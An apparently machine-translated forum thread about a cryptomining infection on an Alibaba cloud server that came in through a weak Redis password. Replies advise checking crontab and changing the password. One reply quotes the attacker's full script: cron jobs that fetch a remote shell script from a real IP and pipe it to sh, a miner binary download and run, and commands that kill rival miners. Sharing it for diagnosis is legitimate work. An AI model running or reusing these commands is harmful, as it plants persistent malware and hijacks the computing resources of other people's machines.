recently, I suddenly found an abnormal cpu occupation of an Ali CVM, and there are many login failures in a short period of time. Does anyone know?
top
/tmp/qW3xT
top
/tmp/qW3xT
crontab-l check the task
if you have a task, kill to see the location of the script file to delete
have encountered, close the scheduled task, change the reids password, and restart it. It should be mining
Thank you, two bosses, it is indeed a mining script, has been set up a scheduled task, inexperienced.
it should be that the redis password is too weak and has been scanned. I hope you can set up redis not to use a simple password. Execute the script
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3011 || rm -rf /tmp/ddgs.3011
if [ ! -f "/tmp/ddgs.3011" ]; then
curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.$(uname -m) -o /tmp/ddgs.3011
fi
chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
for reference
it is also found that after reids is used, an ip tries to log in to the server every few minutes, which continues until now
my server is also occupied by this hole-digging program today. Cpu 99%
do not know that redis is best not to start? You can't open the default port even if you want to open it.